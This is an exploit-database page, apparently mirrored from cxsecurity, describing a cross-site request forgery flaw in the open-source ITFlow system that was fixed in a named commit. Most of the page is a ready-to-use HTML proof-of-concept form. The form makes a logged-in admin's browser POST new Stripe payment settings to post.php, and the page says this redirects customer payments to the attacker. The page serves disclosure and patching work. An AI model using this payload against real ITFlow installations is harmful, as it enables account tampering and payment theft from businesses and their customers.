Advertisement






ITFlow.org CSRF system settings change

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX Unknown Unknown
Author Risk Exploitation Type Date
Unknown Unknown Remote/Locar 2024-02-25
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020083

Below is a copy:

ITFlow.org CSRF system settings change
Open source ITFlow was vulnerable to CSRF prior commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378
This vulnerability allowed attacker changing system settings such as online payment details and Microsoft Azure SSO credentials. 

If admin user is logged in, we can, using provided PoC redirect him to post.php endpoint and make changes to the system. PoC below makes changes to Stripe related settings, which will lead to attacker receiving payments made through the system.

<html>
<form enctype="multipart/form-data" method="POST" action="https://demo.itflow.org/post.php">
    <table>
        <tr><td>edit_online_payment_settings</td><td><input type="text" value="" name="edit_online_payment_settings"></td></tr>
        <tr><td>config_stripe_enable</td><td><input type="text" value="1" name="config_stripe_enable"></td></tr>
        <tr><td>config_stripe_publishable</td><td><input type="text" value="csrf-poc" name="config_stripe_publishable"></td></tr>
        <tr><td>config_stripe_secret</td><td><input type="text" value="csrf-poc-secret" name="config_stripe_secret"></td></tr>
        <tr><td>config_stripe_account</td><td><input type="text" value="1" name="config_stripe_account"></td></tr>
    </table>
    <input type="submit" value="https://demo.itflow.org/post.php">
</form>
</html>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.